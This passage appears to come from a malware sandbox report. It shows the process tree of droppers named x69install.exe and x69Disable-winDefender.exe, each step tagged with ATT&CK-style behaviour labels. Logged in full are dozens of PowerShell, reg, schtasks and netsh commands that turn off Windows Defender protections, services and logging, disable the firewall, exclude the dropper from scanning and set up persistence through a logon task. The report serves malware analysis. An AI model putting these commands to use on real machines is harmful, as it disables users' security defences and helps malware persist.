C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6340 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:3648
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
PID:568 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:7076
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
PID:7136 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6808
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:696
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5684
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:2888
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:2080
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:6864
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5800
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4988
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5284
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3716
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:5740
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:5216
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:5660
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:3512
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4460
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:1992
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:5304
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:2052
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:540
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:896
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:1332
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:6152
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:6216
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵
- Modifies registry class
PID:4824
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵
- Modifies registry class
PID:1560
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵
- Modifies registry class
PID:6268
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:4716
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6336
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5032
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6220
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:5504
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:568
-
-
C:\Users\Admin\AppData\Roaming\x69install.exe"C:\Users\Admin\AppData\Roaming\x69install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exeC:\Users\Admin\AppData\Local\Temp\iyMbXS.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1368 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1c955ede.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:776 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1364
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5816 -
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exeC:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71A6.tmp\71A7.tmp\71A8.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true5⤵PID:400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
PID:1440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
PID:3124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
PID:1844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:2400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6664 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:7112
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6608 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:5116
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
PID:7120 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4492
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4820
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:6004
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:116
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:4680
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1252
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2056
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1288
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3004
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:3200
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:7164
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:6164
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:1268
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:2172
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:5876
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:6252
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:3292
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:4848
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:5600
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:6484
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:5252
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:4804
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:6244
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:6084
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:6272
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:472
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6236
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6328
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6372
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:5244
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Users\Admin\AppData\Roaming\x69install.exeC:\Users\Admin\AppData\Roaming\x69install.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1140
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Executes dropped EXE
PID:4676 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Checks processor information in registry
- Modifies Control Panel
- Modifies registry class
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3188 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1976 -prefsLen 27100 -prefMapHandle 1980 -prefMapSize 270279 -ipcHandle 2068 -initialChannelId {21571c9d-3048-4321-9836-e694bf23e461} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu4⤵
- Executes dropped EXE
PID:2312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2428 -prefsLen 27136 -prefMapHandle 2432 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {0edd748a-82c0-4aca-b2b9-fb787fb13589} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3760 -prefsLen 27277 -prefMapHandle 3764 -prefMapSize 270279 -jsInitHandle 3768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3776 -initialChannelId {d458b5a4-b9bd-41d8-a284-8dc8eb3b2b80} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3924 -prefsLen 27277 -prefMapHandle 3928 -prefMapSize 270279 -ipcHandle 4032 -initialChannelId {505e0550-0c60-4cc2-b67c-36a4c6a346a5} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd4⤵
- Executes dropped EXE
PID:6048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4520 -prefsLen 34776 -prefMapHandle 4528 -prefMapSize 270279 -jsInitHandle 4532 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2984 -initialChannelId {90df4ef6-3010-4d3f-9f14-f3f54ece2a3e} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4800
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5088 -prefsLen 35013 -prefMapHandle 5092 -prefMapSize 270279 -ipcHandle 1504 -initialChannelId {10f2cfd3-048f-4fad-8605-351904c8cf1e} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:6348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2792 -prefsLen 32952 -prefMapHandle 2788 -prefMapSize 270279 -jsInitHandle 5588 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4964 -initialChannelId {833f46d8-5d08-4bcf-97aa-0ab767e614eb} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab4⤵
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
PID:6692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5752 -prefsLen 32952 -prefMapHandle 5756 -prefMapSize 270279 -jsInitHandle 5760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5768 -initialChannelId {c52553ae-623b-4cf8-abe0-c9caf8df8d81} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:6704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5940 -prefsLen 32952 -prefMapHandle 5944 -prefMapSize 270279 -jsInitHandle 5948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5956 -initialChannelId {814d3c91-a892-4a30-ad0e-fac83d3d0178} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:6728
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2772 -prefsLen 35427 -prefMapHandle 5568 -prefMapSize 270279 -jsInitHandle 4732 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6540 -initialChannelId {fb3dfaa7-d842-4fb9-96c9-1be6c997c09f} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:6744
-
-
-
-
C:\Users\Admin\Downloads\TCPView\tcpview64.exe"C:\Users\Admin\Downloads\TCPView\tcpview64.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3288
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3800
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4088
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4140
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:5180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:6108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:6024
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3660
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1492
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4352
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2296
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1148
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:5964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:2212
-
